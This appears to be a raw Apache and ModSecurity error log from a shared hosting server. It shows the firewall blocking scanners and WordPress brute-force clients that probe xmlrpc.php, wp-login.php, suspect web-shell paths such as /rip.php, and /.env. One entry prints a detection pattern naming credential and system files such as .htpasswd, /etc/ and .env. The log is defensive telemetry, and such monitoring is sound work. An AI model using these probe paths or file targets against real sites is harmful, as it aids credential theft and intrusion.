[Tue May 26 14:35:19.239203 2026] [security2:error] [pid 626747:tid 626967] [client 4.201.75.230:5260] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/inputs.php"] [unique_id "ahViTxVF8Qmdmw_OMfLtMQAAAWQ"]
[Tue May 26 14:35:19.326385 2026] [core:crit] [pid 626747:tid 626938] (13)Permission denied: [client 40.77.167.18:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:35:19.594532 2026] [core:crit] [pid 626747:tid 626985] (13)Permission denied: [client 40.77.167.18:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:35:20.529182 2026] [security2:error] [pid 626747:tid 626988] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViUBVF8Qmdmw_OMfLtWQAAAXk"]
[Tue May 26 14:35:21.313775 2026] [security2:error] [pid 626747:tid 626881] [client 202.141.83.254:19756] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahViURVF8Qmdmw_OMfLtcAAAAQ4"]
[Tue May 26 14:35:21.313899 2026] [security2:error] [pid 626747:tid 626881] [client 202.141.83.254:19756] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahViURVF8Qmdmw_OMfLtcAAAAQ4"]
[Tue May 26 14:35:21.667343 2026] [security2:error] [pid 626747:tid 626907] [client 4.201.75.230:5272] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/ioxi-o.php"] [unique_id "ahViURVF8Qmdmw_OMfLtfAAAASg"]
[Tue May 26 14:35:22.687456 2026] [security2:error] [pid 626747:tid 626916] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViUhVF8Qmdmw_OMfLtjgAAATE"]
[Tue May 26 14:35:22.984123 2026] [security2:error] [pid 626747:tid 626973] [client 154.161.32.97:46547] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahViUhVF8Qmdmw_OMfLtoQAAAWo"]
[Tue May 26 14:35:22.984327 2026] [security2:error] [pid 626747:tid 626973] [client 154.161.32.97:46547] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahViUhVF8Qmdmw_OMfLtoQAAAWo"]
[Tue May 26 14:35:23.537771 2026] [security2:error] [pid 626747:tid 626928] [client 4.201.75.230:5258] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/function/function.php"] [unique_id "ahViUxVF8Qmdmw_OMfLtuwAAAT0"]
[Tue May 26 14:35:23.615258 2026] [core:error] [pid 626747:tid 626933] [client 198.235.24.24:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:35:23.615285 2026] [core:error] [pid 626747:tid 626933] [client 198.235.24.24:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:35:24.390311 2026] [security2:error] [pid 626747:tid 626813] [remote 82.196.25.136:35268] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 136.25.196.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahViVBVF8Qmdmw_OMfLt0QABDEE"]
[Tue May 26 14:35:24.910944 2026] [security2:error] [pid 626747:tid 626922] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViVBVF8Qmdmw_OMfLt4AAAATc"]
[Tue May 26 14:35:26.428330 2026] [security2:error] [pid 626747:tid 626924] [client 17.22.245.245:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahViVhVF8Qmdmw_OMfLuBQAAATk"]
[Tue May 26 14:35:26.767892 2026] [security2:error] [pid 626747:tid 626889] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViVhVF8Qmdmw_OMfLuDgAAARY"]
[Tue May 26 14:35:27.054567 2026] [security2:error] [pid 626747:tid 626931] [client 202.76.183.98:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViVhVF8Qmdmw_OMfLuGAAAAUA"]
[Tue May 26 14:35:27.838299 2026] [security2:error] [pid 626747:tid 626894] [client 4.201.75.230:5251] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/rip.php"] [unique_id "ahViVxVF8Qmdmw_OMfLuOAAAARs"]
[Tue May 26 14:35:28.711938 2026] [security2:error] [pid 626747:tid 626913] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViWBVF8Qmdmw_OMfLuRQAAAS4"]
[Tue May 26 14:35:31.168526 2026] [security2:error] [pid 626747:tid 626882] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViWhVF8Qmdmw_OMfLueQAAAQ8"]
[Tue May 26 14:35:31.681581 2026] [security2:error] [pid 626747:tid 626899] [client 202.141.83.254:19891] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahViWxVF8Qmdmw_OMfLukgAAASA"]
[Tue May 26 14:35:31.682139 2026] [security2:error] [pid 626747:tid 626899] [client 202.141.83.254:19891] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahViWxVF8Qmdmw_OMfLukgAAASA"]
[Tue May 26 14:35:31.785078 2026] [security2:error] [pid 626747:tid 626929] [client 4.201.75.230:5265] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/admin.php"] [unique_id "ahViWxVF8Qmdmw_OMfLukwAAAT4"]
[Tue May 26 14:35:32.705555 2026] [security2:error] [pid 626747:tid 626999] [client 4.201.75.230:5267] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/wp-content/uploads/index.php"] [unique_id "ahViXBVF8Qmdmw_OMfLurQAAAYQ"]
[Tue May 26 14:35:33.003026 2026] [security2:error] [pid 626747:tid 626978] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViXBVF8Qmdmw_OMfLurAAAAW8"]
[Tue May 26 14:35:34.826473 2026] [security2:error] [pid 626747:tid 626890] [client 4.201.75.230:5262] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/cache.php"] [unique_id "ahViXhVF8Qmdmw_OMfLu6wAAARc"]
[Tue May 26 14:35:34.958275 2026] [security2:error] [pid 626747:tid 626926] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViXhVF8Qmdmw_OMfLu3gAAATs"]
[Tue May 26 14:35:36.955407 2026] [security2:error] [pid 626747:tid 626906] [client 154.161.32.97:57043] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahViYBVF8Qmdmw_OMfLvHwAAASc"]
[Tue May 26 14:35:36.955524 2026] [security2:error] [pid 626747:tid 626906] [client 154.161.32.97:57043] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahViYBVF8Qmdmw_OMfLvHwAAASc"]
[Tue May 26 14:35:37.049018 2026] [security2:error] [pid 626747:tid 626895] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViYBVF8Qmdmw_OMfLvFQAAARw"]
[Tue May 26 14:35:38.722002 2026] [security2:error] [pid 626747:tid 626917] [client 208.91.198.85:45126] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "rehobothindependentcare.com"] [uri "/wp-cron.php"] [unique_id "ahViYhVF8Qmdmw_OMfLvXgAAATI"]
[Tue May 26 14:35:39.242459 2026] [security2:error] [pid 626747:tid 626924] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViYhVF8Qmdmw_OMfLvZQAAATk"]
[Tue May 26 14:35:40.820046 2026] [security2:error] [pid 626747:tid 626922] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViZBVF8Qmdmw_OMfLvkwAAATc"]
[Tue May 26 14:35:41.877925 2026] [security2:error] [pid 626747:tid 626907] [client 207.246.106.216:47186] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 216.106.246.207.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahViZRVF8Qmdmw_OMfLv3gAAASg"]
[Tue May 26 14:35:42.172729 2026] [security2:error] [pid 626747:tid 626957] [client 202.141.83.254:19826] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahViZhVF8Qmdmw_OMfLv_AAAAVo"]
[Tue May 26 14:35:42.172927 2026] [security2:error] [pid 626747:tid 626957] [client 202.141.83.254:19826] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahViZhVF8Qmdmw_OMfLv_AAAAVo"]
[Tue May 26 14:35:42.254598 2026] [security2:error] [pid 626747:tid 626974] [client 207.246.106.216:47198] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 216.106.246.207.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahViZRVF8Qmdmw_OMfLv8QAAAWs"]
[Tue May 26 14:35:42.519875 2026] [security2:error] [pid 626747:tid 626935] [client 207.246.106.216:52860] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 216.106.246.207.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahViZhVF8Qmdmw_OMfLwKAAAAUQ"]
[Tue May 26 14:35:42.864111 2026] [security2:error] [pid 626747:tid 626862] [remote 103.11.102.106:56632] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahViZhVF8Qmdmw_OMfLwRgABU3I"]
[Tue May 26 14:35:43.328714 2026] [security2:error] [pid 626747:tid 626904] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViZhVF8Qmdmw_OMfLwWQAAASU"]
[Tue May 26 14:35:43.413670 2026] [security2:error] [pid 626747:tid 626946] [client 207.246.106.216:47156] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bosscoirs.com"] [uri "/index.php"] [unique_id "ahViZRVF8Qmdmw_OMfLv7wAAAU8"]
[Tue May 26 14:35:43.620074 2026] [security2:error] [pid 626747:tid 626900] [client 207.246.106.216:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bosscoirs.com"] [uri "/index.php"] [unique_id "ahViZhVF8Qmdmw_OMfLv-QAAASE"]
[Tue May 26 14:35:45.343864 2026] [security2:error] [pid 626747:tid 626886] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViaBVF8Qmdmw_OMfLwmgAAARM"]
[Tue May 26 14:35:45.501644 2026] [security2:error] [pid 626747:tid 626973] [client 4.201.75.230:5283] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/themes.php"] [unique_id "ahViaRVF8Qmdmw_OMfLwsgAAAWo"]
[Tue May 26 14:35:47.507091 2026] [security2:error] [pid 626747:tid 626976] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViaxVF8Qmdmw_OMfLw4AAAAW0"]
[Tue May 26 14:35:48.140214 2026] [core:error] [pid 626747:tid 626979] [client 87.166.58.72:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://www.financepointaustralia.srsglobalsoft.com/
[Tue May 26 14:35:48.140237 2026] [core:error] [pid 626747:tid 626979] [client 87.166.58.72:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://www.financepointaustralia.srsglobalsoft.com/
[Tue May 26 14:35:49.472700 2026] [security2:error] [pid 626747:tid 626909] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVibRVF8Qmdmw_OMfLxEAAAASo"]
[Tue May 26 14:35:51.238019 2026] [core:error] [pid 626747:tid 626897] [client 3.18.186.238:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:35:51.238042 2026] [core:error] [pid 626747:tid 626897] [client 3.18.186.238:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:35:51.663410 2026] [security2:error] [pid 626747:tid 626893] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVibxVF8Qmdmw_OMfLxWwAAARo"]
[Tue May 26 14:35:52.518401 2026] [security2:error] [pid 626747:tid 626907] [client 202.141.83.254:53879] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVicBVF8Qmdmw_OMfLxhQAAASg"]
[Tue May 26 14:35:52.519090 2026] [security2:error] [pid 626747:tid 626907] [client 202.141.83.254:53879] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVicBVF8Qmdmw_OMfLxhQAAASg"]
[Tue May 26 14:35:53.672520 2026] [security2:error] [pid 626747:tid 626920] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVicRVF8Qmdmw_OMfLxoQAAATU"]
[Tue May 26 14:35:56.380357 2026] [security2:error] [pid 626747:tid 626953] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVicxVF8Qmdmw_OMfLx5wAAAVY"]
[Tue May 26 14:35:56.442532 2026] [security2:error] [pid 626747:tid 626952] [client 4.201.75.230:5252] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/an.php"] [unique_id "ahVidBVF8Qmdmw_OMfLx7wAAAVU"]
[Tue May 26 14:35:56.722875 2026] [autoindex:error] [pid 626747:tid 626832] [remote 15.204.161.7:49432] AH01276: Cannot serve directory /home2/jhonwy9v/stvica.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:35:57.654011 2026] [security2:error] [pid 626747:tid 626903] [client 176.65.139.236:55234] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.meet.moes-art.com"] [uri "/.env"] [unique_id "ahVidRVF8Qmdmw_OMfLyBwAAASQ"]
[Tue May 26 14:35:57.853481 2026] [security2:error] [pid 626747:tid 626962] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVidRVF8Qmdmw_OMfLyAwAAAV8"]
[Tue May 26 14:35:59.171133 2026] [security2:error] [pid 626747:tid 626952] [client 37.19.197.234:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVidhVF8Qmdmw_OMfLyIwAAAVU"]
[Tue May 26 14:36:00.063737 2026] [security2:error] [pid 626747:tid 626958] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVidxVF8Qmdmw_OMfLyOgAAAVs"]
[Tue May 26 14:36:02.023344 2026] [security2:error] [pid 626747:tid 626882] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVieRVF8Qmdmw_OMfLyeQAAAQ8"]
[Tue May 26 14:36:02.839811 2026] [security2:error] [pid 626747:tid 627003] [client 4.201.75.230:5266] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/index/function.php"] [unique_id "ahViehVF8Qmdmw_OMfLymwAAAYg"]
[Tue May 26 14:36:02.932181 2026] [security2:error] [pid 626747:tid 626930] [client 202.141.83.254:53772] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahViehVF8Qmdmw_OMfLynAAAAT8"]
[Tue May 26 14:36:02.932314 2026] [security2:error] [pid 626747:tid 626930] [client 202.141.83.254:53772] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahViehVF8Qmdmw_OMfLynAAAAT8"]
[Tue May 26 14:36:04.173423 2026] [security2:error] [pid 626747:tid 626905] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViexVF8Qmdmw_OMfLytQAAASY"]
[Tue May 26 14:36:05.137934 2026] [security2:error] [pid 626747:tid 626930] [client 89.124.113.81:45897] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 81.113.124.89.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-comments-post.php"] [unique_id "ahVifBVF8Qmdmw_OMfLy2wAAAT8"], referer: https://atreegroup.com/2025/10/05/hello-world/
